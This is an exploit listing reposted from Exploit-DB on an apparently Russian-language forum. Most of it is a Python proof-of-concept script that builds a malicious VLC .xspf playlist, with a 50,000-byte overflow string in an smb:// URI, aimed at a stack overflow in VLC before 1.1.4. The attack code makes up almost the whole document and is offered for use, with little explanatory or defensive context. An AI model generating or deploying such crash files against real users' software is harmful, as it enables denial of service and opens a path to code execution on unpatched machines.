Exploit VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14892
Проверка EDB
  1. Пройдено
Автор
S-DZ
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2010-09-04
Код:
#!/usr/bin/python
#
# Exploit Title:	VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC
# Date:			 04-09-2010
# Author:		Hadji Samir   , s-Dz[at]hotmail[dot]fr
# Software Link:	http://sourceforge.net/projects/vlc/files/1.1.4/win32/vlc-1.1.4-win32.exe/download?use_mirror=garr
# Version:		VLC Media Player < 1.1.4
# Tested on:	Windows XP sp2 with VLC 1.1.4 
# CVE :
# Notes:		Samir tjrs mahboul-3lik ...
#			 
###############################################################################################################		
  

data1 = (
"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31"
"\x2E\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54"
"\x46\x2D\x38\x22\x3F\x3E\x0D\x0A\x3C\x70\x6C\x61\x79\x6C\x69\x73"
"\x74\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x22\x20\x78\x6D"  
"\x6C\x6E\x73\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E" 
"\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F\x22\x20\x78\x6D"  
"\x6C\x6E\x73\x3A\x76\x6C\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F" 
"\x77\x77\x77\x2E\x65\x78\x65\x6D\x70\x6C\x65\x2E\x6F\x72\x67\x2F"  
"\x22\x3E\x0D\x0A\x09\x3C\x74\x69\x74\x6C\x65\x3E\x50\x6C\x61\x79"  
"\x6C\x69\x73\x74\x3C\x2F\x74\x69\x74\x6C\x65\x3E\x0D\x0A\x09\x3C" 
"\x74\x72\x61\x63\x6B\x4C\x69\x73\x74\x3E\x0D\x0A\x09\x09\x3C\x74"
"\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x09\x09\x3C\x6C\x6F\x63\x61\x74" 
"\x69\x6F\x6E\x3E\x73\x6D\x62\x3A\x2F\x2F\x65\x78\x61\x6D\x70\x6C" 
"\x65\x2E\x63\x6F\x6D\x40\x77\x77\x77\x2E\x65\x78\x61\x6D\x70\x6C"  
"\x65\x2E\x63\x6F\x6D\x2F\x23\x7B") 

buff = ("\x41" * 50000 )

data2 = ( 
"\x7D\x3C\x2F\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x3E"
"\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x20\x61\x70\x70\x6C\x69"
"\x63\x61\x74\x69\x6F\x6E\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77"
"\x77\x77\x2E\x76\x69\x64\x65\x6F\x6C\x61\x6E\x2E\x6F\x72\x67\x2F" 
"\x76\x6C\x63\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74\x2F\x30\x22\x3E"
"\x0D\x0A\x09\x09\x09\x09\x3C\x76\x6C\x63\x3A\x69\x64\x3E\x30\x3C"  
"\x2F\x76\x6C\x63\x3A\x69\x64\x3E\x0D\x0A\x09\x09\x09\x3C\x2F\x65" 
"\x78\x74\x65\x6E\x73\x69\x6F\x6E\x3E\x0D\x0A\x09\x09\x3C\x2F\x74"
"\x72\x61\x63\x6B\x3E\x0D\x0A\x09\x3C\x2F\x74\x72\x61\x63\x6B\x4C" 
"\x69\x73\x74\x3E\x0D\x0A\x3C\x2F\x70\x6C\x61\x79\x6C\x69\x73\x74" 
"\x3E\x0D\x0A\x0D\x0A") 

wizz = open("Mahboul-3lik.xspf","w") 
wizz.write(data1 + buff + data2) 
wizz.close()
 
Источник
www.exploit-db.com

Похожие темы